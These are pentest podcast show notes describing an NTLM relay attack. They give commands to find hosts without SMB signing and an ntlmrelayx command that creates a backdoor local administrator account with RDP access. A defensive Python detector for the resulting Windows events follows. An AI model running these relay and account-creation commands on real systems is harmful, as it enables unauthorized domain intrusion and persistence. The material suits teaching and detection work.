7MS #372: Tales of Internal Pentest Pwnage - Part 5
7 Minute Security - 15 July 2019

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMware. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:

  • Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt
grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

Source: Pwning internal networks automagically

  • Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:
net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add

So the full command would be:

ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'
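
On the defending side, the -c string above leaves a recognizable trail in the Windows Security log: event 4720 (user account created) followed within seconds by event 4732 (member added to a local group) for Administrators and Remote Desktop Users on the same host. The following correlation check is an added example, not code from the episode or its show notes; the simplified record fields, the 5-minute window and the sample events are constructed assumptions.

```python
from datetime import datetime, timedelta

# Well-known SIDs of the two local groups the relayed command touches.
WATCHED_GROUPS = {"S-1-5-32-544": "Administrators",
                  "S-1-5-32-555": "Remote Desktop Users"}
WINDOW = timedelta(minutes=5)  # assumption: tune to your environment

def find_rogue_local_admins(events):
    """Flag accounts created (4720) and then added to a watched local
    group (4732) on the same host within WINDOW of their creation."""
    created = {}   # (host, account SID) -> (creation time, account name)
    findings = {}  # (host, account name) -> set of watched group names
    # Sort by time, then event ID, so a 4720 precedes a same-second 4732.
    for ev in sorted(events, key=lambda e: (e["time"], e["event_id"])):
        if ev["event_id"] == 4720:
            created[(ev["host"], ev["account_sid"])] = (ev["time"], ev["account_name"])
        elif ev["event_id"] == 4732 and ev["group_sid"] in WATCHED_GROUPS:
            hit = created.get((ev["host"], ev["member_sid"]))
            if hit and ev["time"] - hit[0] <= WINDOW:
                findings.setdefault((ev["host"], hit[1]), set()).add(
                    WATCHED_GROUPS[ev["group_sid"]])
    return findings

def _ev(host, hhmmss, event_id, **fields):
    t = datetime.strptime("2019-07-15 " + hhmmss, "%Y-%m-%d %H:%M:%S")
    return {"host": host, "time": t, "event_id": event_id, **fields}

# Constructed sample records (simplified fields, not real log exports).
SID_A = "S-1-5-21-1111-2222-3333-1005"
SID_B = "S-1-5-21-4444-5555-6666-1010"
SAMPLE = [
    _ev("WS01", "10:00:01", 4720, account_sid=SID_A, account_name="ladmin1"),
    _ev("WS01", "10:00:01", 4732, member_sid=SID_A, group_sid="S-1-5-32-544"),
    _ev("WS01", "10:00:02", 4732, member_sid=SID_A, group_sid="S-1-5-32-555"),
    # Benign: account created, added to Administrators hours later.
    _ev("WS02", "08:00:00", 4720, account_sid=SID_B, account_name="helpdesk"),
    _ev("WS02", "13:30:00", 4732, member_sid=SID_B, group_sid="S-1-5-32-544"),
    # Benign: existing account added to a group that is not watched.
    _ev("WS03", "09:00:00", 4732, member_sid="S-1-5-21-7-8-9-1001",
        group_sid="S-1-5-32-545"),
]

if __name__ == "__main__":
    for (host, name), groups in find_rogue_local_admins(SAMPLE).items():
        print(f"{host}: new account {name!r} added to {sorted(groups)}")
```

These events are only written when the Audit User Account Management and Audit Security Group Management subcategories are enabled on the endpoints, and they need to be forwarded centrally to be correlated across hosts.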

Check today's show notes at https://7ms.us for more information!
